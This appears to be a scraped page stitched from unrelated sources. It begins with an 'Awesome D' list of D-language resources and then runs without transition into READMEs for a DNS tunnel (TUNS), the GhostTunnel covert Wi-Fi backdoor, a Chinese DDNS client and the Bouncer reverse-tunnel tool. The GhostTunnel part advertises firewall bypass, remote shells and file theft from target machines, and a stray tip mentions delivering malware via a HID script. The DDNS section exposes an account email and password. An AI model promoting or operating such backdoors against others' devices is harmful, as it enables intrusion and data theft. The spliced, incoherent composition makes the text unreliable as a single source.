• Awesome D
  
  • Basic Information
    • Official Website
    • Getting Help
    • People
    • Events
    • Organizations
  • Documents
    • Books
    • Tutorials
    • Blogs
    • Articles
    • API Doc
  • Language Related
    • Package Management
    • Compilers
    • Build Tools
    • IDE
    • Lexers, Parsers, Generators
    • Preprocessors
  • Compiler for other languages
    • Javascript
  • Common/Utilities
    • Basic
    • Containers
  • Networking/Web Related
    • Networking
    • Web Frameworks
    • Data&Serialization
  • Database
    • Database clients
  • GUI
    • GUI Libs
  • OS
    • Operating Systems
  • Gaming
    • Bindings
    • Frameworks
    • Games
  • Video
    • Applications
  • Image Processing
    • Applications
  • End-user applications (AppImages, Flatpaks, Snaps...)
    • Applications
  • Scientific
    • Scientific
  • Machine Learning
    • Machine Learning
  • Parallel computing
  • Others
    • Text Processing
    • Command Line
    • Logging
    • Configuration
    • BlogEngine
    • Testing
• Other Awesome Lists
  

Official Website

• dlang.org - Official website for D.
• wiki.dlang.org - Official Wiki for D.
• code.dlang.org - Offical Library/Module Registry for D.
• Github Organization - Official GitHub organization for D. Repo for all official D tools & code.
• forum.dlang.org - Official forum. Many interesting discussions occurring on a daily basis.
• blog.dlang.org - Official blog.
• Language Specification - D programming language specification.
• Issue tracking - Official issue tracking/reporting system for D. If you find bugs in the D compiler and/or libraries, please come and report them!

Getting Help

• Official D Forum Learn Group - Highest traffic site for answering D questions.
• D on Stack Overflow - Less traffic than forums but possibly easier to search.
• D on Rosetta Code - Examples of how to do many basic things in D.

People

• Walter Bright - Father of D. Walter Bright is the creator and first implementer of the D programming language and has implemented compilers for several other languages.
• Andrei Alexandrescu, PhD - C++ guru. Author of The D Programming Language and Modern C++ Design. With Walter Bright, Andrei co-designed many important features of D and authored a large part of D's standard library. Andrei works as a trainer in advanced C++ programming and algorithms and is now actively evangelizing D in the organization.
• YOU - Please add your information if you've done something interesting in D. It is you, the awesome people that made D awesome.

Events

• DConf - the premier event where D luminaries exchange knowledge, insight, and inspiration on everything related to the D language and its ecosystem.

Organizations

• D Programming Language - Official Organization, hosts DMD, Phobos and other official tools and libs.
• LDC Developers - LDC releated projects.
• DerelictOrg - A GitHub organization hosting all Derelict bindings including OpenGL and other multimedia/game related library bindings. (OpenGL 3, Bgfx, ENet, SDL 2, GLFW 3，OpenGLES, Free Image, Assimp3, libtheora, libogg, libvorbis, SFML 2, libpq, PhysicsFS, Open Dynamics Engine, Lua, DevIL, OpenAL, ALURE).
• DlangScience -A focal point and first port of call for scientific libraries and tooling for D.
• Circular Studios - We are a group of game developers at Rochester Institute of Technology building games and game tech. Hosts Dash, a 3D game engine written in D, and other related libs.
• d-gamedev-team - An organization of gamedev related repos, including a D gamedev toolkit called gfm and an opengl tutorial in D.
• EMSI - A Career building company that uses D as their main language. Hosts their opensource projects.
• infognition - Infognition is a self-funded and self-sustained company specializing in video processing and compression technologies for end-users and developers. They provide several opensource video related applications & tools written in D, hosted on bitbucket. They are also porting their main product--Video Enchanser from C/C++ to D.
• libmir - D's numeric library development team
• sociomantic labs - Berlin based company specializing in real-time bidding for online advertising. Main sponsor of the annual D language conference. Has open-sourced large parts of their codebase as part of the tsunami organization.
• Symmetry Investments - Symmetry Investments LP is an investment management company with approximately US$4.7 billion in assets under management as of 31 December 2018. Main sponsor of the Symmetry Autumn of Code. Have sponsored the development of excel-d, dpp, autowrap, mir-algorithm, and various other projects.
• HuntLabs - A technology group using DLang. Have pure D language implementation of quickly develop server-side applications and build distributed system services.

Books

• TDPL - The D Programming Language by Andrei Alexandrescu.
• Programming in D - A very detailed book about programming in D by Ali Çehreli covering many areas of the language. Has a free online version and is suitable for beginners.
• D Cookbook - A recipe-packed reference guide filled with practical tasks that are concisely explained to develop and broaden the user's abilities with the D programming language. by Adam D. Ruppe. Here is an interesting review of the book.
• Learning D - This book is intended for those with some background in a C-family language who want to learn how to apply their knowledge and experience to D. (...) This book will help you get up to speed with the language and avoid common pitfalls that arise when translating C-family experience to D.
• D Web Development - Whether you are new to the world of D, or already have developed applications in D, or if you want to leverage the power of D for web development, then this book is ideal for you.

Tutorials

• The Dlang Tour - An interactive tutorial for D, inspired by Golang Tour.
• Pragmatic D tutorial - This is a pragmatic introduction to the D Programming Language. by Andreas Zwinkau.
• D Template Tutorial - A tutorial dedicated to D Templates. Very good explanation about templates. Has pdf version. by Philippe Sigaud.
• Component programming in D - An article written by Walter Bright that details how D's functional support leads to a flexible and beautiful component programming style.
• Component programming with ranges - A detailed blog post about how to do component programming in a idiomatic D way with ranges, with a full working example.
• Functional image processing in D - A very interesting tutorial about writing an image processing lib in D. Shows the power of D's templates/CTFE/Ranges/UFCS for functional style programming.
• OpenGL tutorials - OpenGL tutorials in D.

Bare metal / kernel development

• D Bare bones - kernel hello world in D (using GDC compiler)
• D barebone with ldc2 - another kernel hello world in D (using LDC compiler)
• XOmB bare bones - an exokernel operating system written in D. Main page, github.
• Bare Metal ARM Cortex-M GDC Cross Compiler - building a bare metal ARM Cortex-M (arm-none-eabi) GDC cross compiler for a Linux host.

Blogs

• blog.dlang.org - Official blog.
• /r/d_language on Reddit - A feed of news and blog posts about D.
• This week in D - A weekly overview of activity in the D community and brief advice columns to help you get the most out of the D Programming Language.
• Planet D - A repository of co-authored D-specific blogs maintained by Vladimir Panteleev.
• D Idioms - A great blog for many useful idioms with D programming.
• GTK-D coding - Simple examples of how to use GtkD to build GUI applications.

Articles

• Purity in D - An article that explains the design principles behind D's purity feature.
• Hidden treasures in the D standard library - An article talking about several useful functions and templates in Phobos.
• Porting D Runtime to ARM - A study about porting a minimal D runtime to ARM Cortex-M preprocessors.
• D is for Data Science - A great post about how D is suitable for data science, particularly, replacing the role of python scripts for fast prototyping.
• D Functional Garden

Package Management

• code.dlang.org - Official D library repository. Backed by dub.
• dub - Official package and build management system for D.

Compilers

• dmd - The reference compiler for the D programming language. Stable, builds insanely fast, very good for learning and rapid prototyping/development. Currently the frontend is implemented in D, and shared between dmd, ldc and gdc, the backend is implemented in C++.
• ldc - The LLVM-based D compiler. Uses the DMD frontend and LLVM backend. Builds slower than dmd, but generates more optimized code than DMD. It supports all the target platforms of LLVM.
• gdc - GNU D Compiler. Use DMD frontend and GCC backend. Currently targets the most platforms due to the use of GCC. Generated code runs faster than DMD in most cases, on par with LDC. In the process of integration with the official GCC toolchain.
• sdc - The Stupid D Compiler. Written in D. Grows Smarter every day.
• dil - A compiler for the D programming language. Written in D.

Build Tools

• dub - De facto official package and build management system for D. Will be included officially soon.
• scons-d - Scons has built-in support for building D projects, thanks to Russel Winder.
• premake - Premake has built-in support for D projects
• reggae - meta build system in D
• Makefile - Makefile template for D projects
• cmake-d - CMake D Projects
• cook2 - Fast incremental build tool intended for projects in D
• button - A universal build system to build your software at the push of a button.
• wild - Wild build system, used to build the PowerNex kernel

IDE

• Mono-D - A D language addon for Xamarin Studio/MonoDevelop. With dub support.
• Visual D - Visual Studio extension for the D programming language.
• DDT - Eclipse plugin for the D programming language.
• DCD - Independent auto-complete program for the D programming language. Could be used with editors like vim, emacs, sublime text, textadept, and zeus. See editors support.
• Coedit - IDE for the D programming language, its compilers, tools and libraries.
• Dlang IDE - D language IDE based on DlangUI. This is a pure D implementation.
• D Language Server - Language Server Protocol (LSP) implementation for D. Adds modern IDE features to any editor with LSP support (VSCode, Sublime, Atom, Emacs, Vim/Neovim)

Lexers, Parsers, Parser Generators

• libdparse - A D language lexer and parser, (possibly) future standard D parser/lexer.
• Martin Nowak's Lexer - A lexer generator.
• Mono-D's DParser - A D parser written in C# and used in Mono-D.
• Pegged - A Parsing Expression Grammar (PEG) module written in D.
• Goldie - Goldie Parsing System.
• ctpg - Compile-Time Parser (with converter) Generator written in D.
• dunnart - LALR(1) Parser Generator written in D.

Preprocesors

• warp - A fast preprocessor for C and C++ used in Facebook infrastructure. Written by Walter Bright.

Javascript

• higgs - Higgs JavaScript Virtual Machine, implemented in D.

Basic

• hunt - A refined core library for D programming language. The module has concurrency / collection / event / io / logging / text / serialize and more.
• hunt-time - A time library and similar to Joda-time and Java.time api.
• hunt-validation - A data validation library for DLang based on hunt library.

Containers

• EMSI containers - Containers that do not use the GC

• memutils - Overhead allocators, allocator-aware containers and lifetime management for D objects
• dlib.container - generic data structures (GC-free dynamic and associative arrays and more)
• std.rcstring - A reference counted string implementation for D's build in string construct

Web Frameworks

• hunt-net - High-performance network library for D programming language, event-driven asynchonous implemention(IOCP / kqueue / epoll).
• hunt-http - HTTP/1 and HTTP/2 protocol library for D.
• hunt-stomp - STOMP for websocket protocol library implement in D.
• libasync - Cross-platform event loop library of asynchronous objects
• libhttp2 - HTTP/2 library in D, translated from nghttp2
• collie - An asynchronous event-driven network framework written in dlang, like netty framework in D.

• Hunt Framework - Hunt is a high-level D Programming Language Web framework that encourages rapid development and clean, pragmatic design. It lets you build high-performance Web applications quickly and easily.
• vibe.d - Asynchronous I/O Web Framework that doesn’t get in your way, written in D.
• arsd - Adam D. Ruppe's web framework.
• cmsed - A component library for Vibe that functions as a CMS.
• Diamond - Full-stack web-framework based on vibe.d, targetting enterprise development and high-performance web solutions for both small and big projects.

• grpc - Grpc for D programming language, hunt-http library based.
• kissrpc - Fast and light, flatbuffers based rpc framework.
• Hprose - A very newbility RPC Library for D, and it support 25+ languages now.
• Apache Thrift - A lightweight, language-independent, featureful RPC framework. Thrift provides clean abstractions for data transport, data serialization, code generation, and application level processing. Dub package

• hunt-gossip - A Apache V2 gossip protocol implementation for D programming language.

• hunt-cache - D language universal cache library, using radix, redis and memcached.

Data serialization

Binary Serilization

• flatbuffers - D Programming Language implementation of the google flatbuffers library.
• cerealed - Serialisation library for D
• dproto - Google Protocol Buffer support in D.

JSON

• vibe.data.json - JSON functions in Vibe.d. Currently the best implementation I used.
• fast.json - A library for D that aims to provide the fastest possible implementation of some every day routines.
• std.json - D's standard library JSON module. Needs refinement.
• painlessjson - Convert between D types and std.json.
• std.data.json - Phobos candidate for JSON serialization (based on Vibed)
• asdf - Cache oriented string based JSON representation for fast read & writes and serialisatoin.

XML

• orange - General purpose serializer (currently only supports XML)
• std.experimental.xml - Phobos candidate for a XML serialization
• [dom.d] - an xml/html DOM based on what Javascript provides in browsers

Database clients

• hunt-entity - Hunt entity is an object-relational mapping tool for the D programming language. Referring to the design idea of JPA, support PostgreSQL / MySQL / SQLite.
• hunt-database - Hunt database abstraction layer for D programing language, support PostgreSQL / MySQL / SQLite.
• vibe.d - Vibe.d has internal support for Redis and MongoDB, which are very stable. Soon, the database drivers will be separated into independent projects.
• mysql-native - A MySQL client implemented in native D.
• ddb - Database access for D2. Currently only supports PostgreSQL.
• arsd - Adam D. Ruppe's library; in addition to a Web backend, it also has support for database access with database.d, sqlite.d, mysql.d and postgres.d.
• ddbc - DDBC is a DB Connector for D language (similar to JDBC). HibernateD (see below) uses ddbc for database abstraction.
• hibernated - HibernateD is an ORM for D (similar to Hibernate).
• dvorm - An ORM for D with Vibe support. Works with vibe.d and mysql-d, giving it the ability to access MongoDB and MySQL.
• Tiny Redis - Redis driver for D. Fast, Simple, Stable. Has no dependencies.

Command Line

• hunt-console - Hunt console creation easier to create powerful command-line applications.
• tilix - A tiling terminal emulator for Linux using GTK+ 3.
• scriptlike - Utility library to aid writing script-like programs in D.
• todod - Todod is a command line based todo list manager. It also has support for shell interaction based on linenoise.
• d-colorize - A port of the ruby library colorize. It add some methods to set color, background color and text effect on console easier using ANSI escape sequences.
• terminal.d - Part of Adam Ruppe's arsd library supporting cursor and color manipulation on the console.
• dexpect - A D implementation of the expect framework. Handy for bash emulation.
• Argon - A processor for command-line arguments, an alternative to Getopt, written in D.
• argsd - A command line and config file parser for DLang
• darg - Robust command line argument parsing for D.

GUI Libs

• DLangUI - Cross Platform GUI for D programming language. My personal favorate, because it is written in D(not a binding), and is cross platform. DLangUI also has a good showcase in the IDE DLangIDE.
• GtkD - GtkD is a D binding and OO wrapper of GTK+. GtkD is actively maintained and is currently the most stable GUI lib for D.
• DWT - A library for creating cross-platform GUI applications. GWT is a port of the Java SWT library to D. DWT was promoted as a semi-standard GUI library for D, but unfortunately didn't catch up popularity yet.
• tkD - GUI toolkit for the D programming language based on Tcl/Tk.
• dqml - Qt Qml bindings for the D programming language.
• Sciter-Dport - D bindings for the Sciter - crossplatform HTML/CSS/script desktop UI toolkit.
• LibUI - Dynamic Binding for libui

OS

• PowerNex - A kernel written in D
• Trinix - Hybrid operating system for x64 PC written in D
• XOmB - An exokernel operating system written in D

Game Bindings

• DerelictOrg - A GitHub organization hosting all Derelict bindings including:
  • OpenGL 3 (DerelictGL3),
  • Bgfx (DerelictBgfx),
  • ENet (DerelictENet),
  • SDL 2 (DerelictSDL2),
  • GLFW 3 (DerelictGLFW3),
  • OpenGLES (DerelictGLES),
  • Free Image (DerelictFI),
  • Assimp3 (DerelictASSIMP3),
  • libtheora (DerelictTheora),
  • libogg (DerelictOgg),
  • libvorbis (DerelictVorbis),
  • SFML 2 (DerelictSFML2),
  • libpq (DerelictPQ),
  • PhysicsFS (DerelictPHYSFS),
  • Open Dynamics Engine (DerelictODE),
  • Lua (DerelictLua),
  • DevIL (DerelictIL),
  • OpenAL (DerelictAL),
  • ALURE (DerelictALURE).

Game Frameworks

• DGame - A 2D framework for the D programming Language. see http://dgame-dev.de/.
• gfm - D gamedev toolkit. see http://d-gamedev-team.github.io/gfm/.
• Dash - A free and open 3D game engine written in D. see http://circularstudios.com/dash.
• DSFML - A static binding of SFML in a way that makes sense for D. see http://dsfml.com/.
• DAllegro5 - D binding/wrapper to Allegro 5, a modern game programming library.
• Voxelman - Plugin-based client-server voxel game engine written in D language
• PolyplexEngine - libpp is an XNA like framework written in D.

Games

• Spacecraft - A 3d multiplayer deathmatch space game written in D 2.0.
• Dtanks - Robot Tank Battle Game.
• [Atrium] (https://github.com/gecko0307/atrium) - FPS game with physics based puzzles using OpenGL.

Video applications

• DerelictGL3 - A dynamic binding to OpenGL for the D Programming Language.

Image Processing

• ArmageddonEngine - Vladimir Panteleev's ae library has a package for image processing in functional style, which is described in the article Functional Image Processing in D.
• Blogsort - A simple Windows app for viewing photos and preparing them for a blog.
• dlib.image - image processing (8 and 16 bits per channel, floating point operations, filtering, FFT, HDRI, graphics formats support including JPEG and PNG)
• color.d + bmp.d, jpg.d, png.d - basic color struct, HSL functions and reading and writing image files

End-user applications

• Drill - Search files without indexing, but clever crawling

Machine Learning

• vectorflow - Nexflix's opensource deep learning framework.

Parallel computing

• DCompute - GPGPU with Native D for OpenCL and CUDA
• DerelictCUDA - Dynamic bindings to the CUDA library for the D Programming Language.
• DerelictCL - Dynamic bindings to the OpenCL library for the D Programming Language.

Scientific

• scid - Scientific library for the D programming language
• dstats - A statistics library for D.
• mir - Sandbox for some mir packages: sparse tensors, Hoffman and others.
• mir-algorithm - N-dimensional arrays (matrixes, tensors), algorithms, general purpose library.
• mir-random - Advanced Random Number Generators.
• decimals - Decimal library for D.

Text Processing

• hunt-markdown - A markdown parsing and rendering library for D programming language. Support commonMark.
• eBay's TSV utilities - Filtering, statistics, sampling, joins and other operations on TSV files. Very fast, especially good for large datasets.

Logging

• std.experimenatal.logger - Phobos's upcoming standard logging facility
• dlogg - Logging for concurrent applications and daemons with lazy and delayed logging, logrotate support.

Configuration

• sdlang - An SDL (Simple Declarative Language) library for D.
• D:YAML - YAML parser and emitter for the D programming language.
• inifile-D - A compile time ini file parser and writter generator for D

Blog Engine

• mood - simple vibe.d based blog engine

Testing

• dunit - Advanced unit testing & mocking toolkit
• unit-threaded - Multi-threaded unit test framework

Other Awesome Lists

TUNS - a simple IP over DNS tunnel
(c) Lucas Nussbaum 
Licensed under GPL v3 or later (see COPYING file)

TUNS is a prototype implementation of an IP over DNS tunnel. It is provided
here in the interest of reproducibility of scientific results, so that
evaluations that were carried out can be reproduced by others.

Its main features are:
- simplicity: it's thought to be as simple as possible.
  + no complex DNS stuff (TXT records, EDNS0, ...) ; uses only CNAME records
  + no splitting of IP packets: sets the MTU and forgets about it
- efficiency
  + it's optimized for low latency

Please note that using TUNS on networks that you don't totally control is
illegal in many countries. As stated above, TUNS is only provided so that you
can reproduce results obtained with it, in experimental setups. If you take the
decision to use it for something else, the author of TUNS can't be held
responsible. If you are unsure, please consult with a lawyer.

Installation
There is no real installation script.
* uncompress the tarball.
* install packages needed to build base32.so (in Debian: rake, ruby1.8-dev)
* build base32.so:
  cd base32-0.1.1
  rake
  cd ..
  cp base32-0.1.1/ext/base32.so .
* then you can run tuns-client or tuns-server. (see below)

Usage
You need to delegate a DNS zone (using NS records) to the system where TUNS
will run. In the following example, we use dnstunnel.tuns.net.

Client: as root, run tuns-client -d dnstunnel.tuns.net
Server: as root, run tuns-server -d dnstunnel.tuns.net

There's a number of possible options you can use to change default values.
See tuns-client -h and tuns-server -h.

After starting the client, type 'help' to get the online help.

Troubleshooting
The meaning of characters output in client's verbose mode is documented at the
start of the tuns-client file. It can help to understand what's wrong.

from https://github.com/lnussbaum/tuns 

Usage

Server

Client

Tips:
Maybe the fastest way is running a HID script to download the malware from P4wnP1's HTTP Server :-)

GhostTunnel

Advantages

• Covertness.
• No interference with the target’s existing connection status and communications.
• Can bypass firewalls.
• Can be used to attack strictly isolated networks.
• Communication channel does not depend on the target’s existing network connection.
• Allow up to 256 clients
• Effective range up to 50 meters
• Cross-Platform Support.
• Can be used to attack any device with wireless communication module, we tested this attack on Window 7 up to Windows 10, and OSX.

Usage

Server

 ./ghosttunnel [interface]
 ./ghosttunnel [interface1] [interface2]

 COMMANDS:
  sessions = list all clients
  use = select a client to operate, use [clientID]
  exit = exit current operation
  wget = download a file from a client, wget [filepath]
  quit = quit ghost tunnel
  help = show this usage help

Client

Release the payload to the target system (only windows client published) and execute it.

Demo

Function Implementation

• Shell command Create a remote shell.
  
• Download file The file maximum size limit is 10M and can only download one file at a time.
  
• You can add other functions as needed.
  

Building

Server Requirements

sudo apt-get install pkg-config libnl-3-dev libnl-genl-3-dev libpcap-dev

Compiling

server:
 cd src
 make
windows client:
 Microsoft Visual Studio 2015 

• Add #include on the top in gt_server.cpp
• apt-get install libpcap0.8-dev
• cd src && make

Thanks

• Aircrack-ng https://github.com/aircrack-ng/aircrack-ng
• MDK4 https://github.com/aircrack-ng/mdk4
• hostapd http://w1.fi/hostapd
• Kismet https://github.com/kismetwireless/kismet

快速安装

• 克隆代码

  git clone https://github.com/LaoLuMian/DDNS.git

• 填写配置信息
  • 选择本地网卡
  • 填写 noip 账号 (测试用账号 support.matchbox@zoho.com)
  • 填写 noip 账号密码 (测试用密码 opensource2018)
  • 填写域名解析更新周期(分钟),比如 5

  ./DDNS-control config test-config

• 启动客户端

  ./DDNS-control start test-config

• 查看运行状态

  ./DDNS-control status test-config

• 查看域名绑定是否成功

  nslookup laolumian.ddns.net 

卸载

• 停止运行

  ./DDNS-control stop 

• 删除配置文件

  ./DDNS-control clean 

查看现有配置

  ./DDNS-control list

更改 DDNS 更新周期

  ./DDNS-control update  

from https://github.com/ChineseTeapot/ddns 

Current Stable Version is 2.2.11

DOC

Schema about Forward / Port Redirector (you need ONE bouncer):

1. Machine-A (Client) init connection to Machine-B (Bouncer)
2. Machine-B init connection to Machine-C (Server)
3. Done: Machine-A is able to speak with Machine-C

Notes about security:

• Machine-A (Client) may be in Internal network.
• Machine-B (Bouncer) may be in DMZ.
• Machine-C (Server) may be in External network.

Schema about Reverse Tunneling (you need TWO bouncers):

Machine-A and Machine-B are Bouncers in Client-Server configuration.

1. Machine-A (MUX-OUT) init connection to Machine-B (MUX-IN)
2. Machine-D (Client) init connection to Machine-B
3. Machine-B request to Machine-A new SubChannel over MUX (Tunnel).
4. Machine-A open connection to Machine-C (Server).
5. Done: Machine-D is able to speak with Machine-C

Notes about security:

• Machine-B (MUX-IN) should be in DMZ.
• Machine-A (MUX-OUT) and Machine-C (Server) may be in internal network.

System Properties (optional)

# To redir stdout/stderr to (auto-daily-rotated) files you can use:
-Dlog.stdOutFile=/var/log/bouncer.out -Dlog.stdErrFile=/var/log/bouncer.err
# To log to stdout too:
-Dlog.stdToo=true 

Filenames are a base-pattern, output files they will be: bouncer.xxx.YEAR-MONTH-DAY (bouncer.xxx.2014-12-01)

Config (bouncer.conf)

# Forward / Port Redirector
#  [opts]

# Reverse Tunneling (Bouncer 2.x syntax)
#  [opts]
#  [opts]

# Note:  can be a coma separated list of addresses, like "srv1,srv2,192.168.1.1"

# Clustering Config
#  [opts]
#  [opts]

Options are comma separated:

• Options for outgoing connections
  • Loadbalancing/Failover (only one option can be used)
    • LB=ORDER: active failover-only in order (DNS resolved IP address are sorted, lower first)
    • LB=RR: active LoadBalancing in DNS order (round-robin)
    • LB=RAND: activate LoadBalancing in DNS random order
  • Sticky Session
    • STICKY=MEM:bitmask:elements:ttl[:cluster-id:replication-id]: activate Sticky session based on IP Source Address. Sessions are stored in MEMory, bitmask is a CIDR to apply in source-ip-address (16=Class B, 24=Class C, 32=Unique host), elements for LRU cache, ttl is time to live of elements in cache (seconds), cluster-id and replication-id in cluster environment is cluster identifier and replication identifier respectively.
• Options for inbound connections
  • PROXY=SEND: use PROXY protocol (v1), generate header for remote server
• Options for Forward / Port Redirector (rinetd)
  • TUN=SSL: activate SSL/TLS tunneling outbound (destination is SSL/TLS, like stunnel)
    • SSL=client.crt:client.key[:server.crt]: specify files for SSL/TLS config (client mode) (optional)
  • TUN=ENDSSL: activate SSL/TLS tunneling inbound (origin is SSL/TLS, like stunnel)
    • ENDSSL=server.crt:server.key[:client.crt]: specify files for SSL/TLS config (server mode)
• Options for Reverse Tunneling (MUX)
  • TUN_ID=number: When use Bouncer 2.x syntax you can create multiple Tunnels over same mux, use this ID for associate both ends.
  • Select operation of MUX (only one option can be used) in Bouncer 1.x config
    • MUX=IN: activate input-terminator multiplexor (Bouncer 2.x syntax: mux-in, tun-listen)
    • MUX=OUT: activate output-initiator multiplexor (Bouncer 2.x syntax: mux-out, tun-connect)
  • Options for encryption (optional -AES or SSL or NONE-):
    • MUX=AES: activate AES encryption in multiplexor (see AES=sharedsecret)
      • AES=sharedsecret: specify the password for AES (no white spaces, no comma sign, no equals sign)
      • AESBITS=bits (optional): specify the keysize for AES (default: 128)
      • AESALG=algorithm (optional): specify the transformation for AES (default: AES/CTR/NoPadding)
    • MUX=SSL: activate SSL/TLS encryption in multiplexor (see SSL=xxx)
      • SSL=server.crt:server.key:client.crt: specify files for SSL/TLS config (server/mux-in)
      • SSL=client.crt:client.key:server.crt: specify files for SSL/TLS config (client/mux-out)
• Options for Clustering (TCP only)
  • Options for encryption (optional -AES or SSL or NONE-):
    • CLUSTER=AES: activate AES encryption in cluster (see AES=sharedsecret)
      • AES=sharedsecret: specify the password for AES (no white spaces, no comma sign, no equals sign)
      • AESBITS=bits (optional): specify the keysize for AES (default: 128)
      • AESALG=algorithm (optional): specify the transformation for AES (default: AES/CTR/NoPadding)
    • CLUSTER=SSL: activate SSL/TLS encryption in cluster (see SSL=xxx)
      • SSL=server.crt:server.key:client.crt: specify files for SSL/TLS config (server/cluster-in)
      • SSL=client.crt:client.key:server.crt: specify files for SSL/TLS config (client/cluster-out)

Notes about LB policies:

• LB=ORDER: ordering of is preserved, but DNS resolved records are sorted numerically before create address list, Example config: srv3,srv2,10.1.1.1 (DNS query return {10.1.3.7,10.1.3.8} for srv3 and {10.1.2.9,10.1.2.3} for srv2), the resulting Address list will be: {10.1.3.7,10.1.3.8,10.1.2.3,10.1.2.9,10.1.1.1}. All connections will be always for 10.1.3.7, if down, 10.1.3.8, and so on. If Sticky is enabled this have preference over address order (no failback).
• LB=RR: ordering of is preserved, and DNS resolved records are not sorted numerically before create address list, Example config: srv3,srv2,10.1.1.1 (DNS query return {10.1.3.7,10.1.3.8} for srv3 and {10.1.2.9,10.1.2.3} for srv2), the resulting Address list will be: {10.1.3.7,10.1.3.8,10.1.2.9,10.1.2.3,10.1.1.1}. The connections are rotative over all addresses for all clients, 10.1.3.7,10.1.3.8,...,10.1.1.1,and again 10.1.3.7,... if an address is down, picks next, and so on.... until a full turn.
• LB=RAND: ordering of is not preserved, and DNS resolved records are not sorted numerically before create address list, instead, all addreses are agregated and shuffled on every connection, Example config: srv3,srv2,10.1.1.1 (DNS query return {10.1.3.7,10.1.3.8} for srv3 and {10.1.2.9,10.1.2.3} for srv2), the resulting Address list can be: {10.1.3.8,10.1.1.1,10.1.3.7,10.1.2.9,10.1.2.3}. The connection first try 10.1.3.8, if down, 10.1.1.1, and so on.... until 10.1.2.3.

Notes about security:

• If use MUX=SSL or CLUSTER=SSL
  • Keys/Certificates are pairs, must be configured in the two ends (MUX-IN & MUX-OUT)
  • files.crt are X.509 public certificates
  • files.key are RSA Keys in PKCS#8 format (no encrypted)
  • files.crt/.key must be in class-path ${BOUNCER_HOME}/keys/
  • be careful about permissions of "files.key" (unix permission 600 may be good)
• If use MUX=AES or CLUSTER=AES, you need to protect the "bouncer.conf" from indiscrete eyes (unix permission 600 may be good)

Example config of Forward / Port Redirector (rinetd style):

#  [opts]
0.0.0.0 1234 127.1.2.3 9876
127.0.0.1 5678 encrypted.google.com 443 LB=RR,STICKY=MEM:24:128:300,TUN=SSL
127.0.0.1 8443 encrypted.google.com 443 TUN=ENDSSL,ENDSSL=server.crt:server.key,TUN=SSL

Example config of Reverse Tunnels (equivalent ssh -p 5555 192.168.2.1 -R 127.0.0.1:8080:192.168.1.1:80)

Machine-A (MUX-OUT):

### Bouncer 1.x legacy syntax ###
#  MUX-OUT
192.168.1.1 80 192.168.2.1 5555 MUX=OUT

### Bouncer 2.x syntax, with support for multi-port ###
#  [opts]
mux-out mux1 127.0.0.1 5555
tun-connect mux1 192.168.2.1 80 TUN_ID=1
tun-connect mux1 192.168.2.1 22 TUN_ID=2

Machine-B (MUX-IN):

### Bouncer 1.x legacy syntax ###
#  MUX-IN
192.168.2.1 5555 127.0.0.1 8080 MUX=IN

### Bouncer 2.x syntax, with support for multi-port ###
#  [opts]
mux-in mux1 192.168.2.1 5555
tun-listen mux1 127.0.0.1 8080 TUN_ID=1
tun-listen mux1 127.0.0.1 2222 TUN_ID=2

Same example config of Reverse tunnels but SSL/TLS

Machine-A (MUX-OUT):

### Bouncer 1.x legacy syntax ###
#  MUX-OUT
192.168.1.1 80 192.168.2.1 5555 MUX=OUT,MUX=SSL,SSL=peerA.crt:peerA.key:peerB.crt

### Bouncer 2.x syntax, with support for multi-port ###
#  [opts]
mux-out mux1 127.0.0.1 5555 MUX=SSL,SSL=peerA.crt:peerA.key:peerB.crt
tun-connect mux1 192.168.2.1 80 TUN_ID=1
tun-connect mux1 192.168.2.1 22 TUN_ID=2
tun-connect mux1 192.168.2.1 25 TUN_ID=3

Machine-B (MUX-IN):

### Bouncer 1.x legacy syntax ###
#  MUX-IN
192.168.2.1 5555 127.0.0.1 8080 MUX=IN,MUX=SSL,SSL=peerB.crt:peerB.key:peerA.crt

### Bouncer 2.x syntax, with support for multi-port ###
#  [opts]
mux-in mux1 192.168.2.1 5555 MUX=SSL,SSL=peerB.crt:peerB.key:peerA.crt
tun-listen mux1 127.0.0.1 8080 TUN_ID=1
tun-listen mux1 127.0.0.1 2222 TUN_ID=2
tun-listen mux1 127.0.0.1 465 TUN_ID=3,TUN=ENDSSL,ENDSSL=server.crt:server.key

For Encryption Tunnels with AES (no SSL/TLS) you can use MUX=AES,AES=sharedsecret in both sides

• More examples in sampleconf

Running (Linux)

./bin/bouncer.sh 

Running (command line without config file)

java -jar bouncer-x.x.x.jar -- "...config.line.1...""...config.line.2..."

Example:
java -jar bouncer-x.x.x.jar -- "0.0.0.0 1234 127.1.2.3 9876""127.0.0.1 5678 encrypted.google.com 443 TUN=SSL"

Running (command line with remote config file)

java -jar bouncer-x.x.x.jar https://config.acme.com/bouncer.conf

RSA Key / X.509 Certificate Generation for MUX-SSL (optional)

./bin/bouncer.sh keygen 

Enabling Strong Ciphers with BouncyCastleProvider

TODOs

• NIO? - for C10K problem, in forward mode, try jrinetd
• Use Log4J
• Limit number of connections
• Limit absolute timeout/TTL of a connection
• Configurable retry-sleeps

DONEs

• Reload config (v1.1)
• Thread pool/control (v1.2)
• Reverse tunnels (like ssh -R) over MUX (multiplexed channels) (v1.2)
• FlowControl in MUX (v1.3)
• Custom timeout by binding (v1.4)
• Encryption MUX/Tunnel (AES+PreSharedSecret) (v1.4)
• Encryption MUX/Tunnel (SSL/TLS) (v1.5)
• Key Generator for MUX-SSL/TLS (v1.5)
• Audit threads / connections (v1.5)
• Improved FlowControl in MUX (v1.5)
• Allow redir stdout/stderr to File, with auto daily-rotate (v1.5.1)
• Enable TLSv1.2 ciphers (v1.5.8)
• Added Elliptic Curve Diffie-Hellman Ephemeral Cipher Suites (v1.5.9)
• Zip Packaging (Maven Assembly) (v1.5.9)
• Allow AutoRegister JCE BouncyCastleProvider (v1.5.9)
• Configurable CipherSuites for SSL/TLS (v1.6.0)
  • For AES-256 you need JCE Unlimited Strength
• Allow different tunnels over same MUX(IN/OUT) (v2.0.1)
• BufferPool for reduce GC pressure (v2.0.1)
• PROXY protocol (v1) for Outgoing connections (v2.1.0)
• Sticky sessions in LoadBalancing (v2.2.1)
• Statistics/Accounting (v2.2.2)
• JMX (v2.2.3)
• Multiple remote-addr (not only multi DNS A-record) (v2.2.4)
• Replicate Sticky Sessions over multiple Bouncers (HA) (v2.2.5)
• Allow alternative config names (v2.2.6)
• Support for End SSL (v2.2.8)
• Support client authentication in TUN=SSL (v2.2.8)
• Support basic command line config without file (scripts,containers,etc) (v2.2.9)
• Support remote config file (http/https) (v2.2.9)

MISC

• Buffer Pool size: 4 (per thread)
• Buffer length for I/O: 4096bytes
• IO-Buffers: 8
• TCP SO_SNDBUF/SO_RCVBUF: BufferLength * IO-Buffers
• Connection timeout: 30seconds
• DNS cache: 2seconds
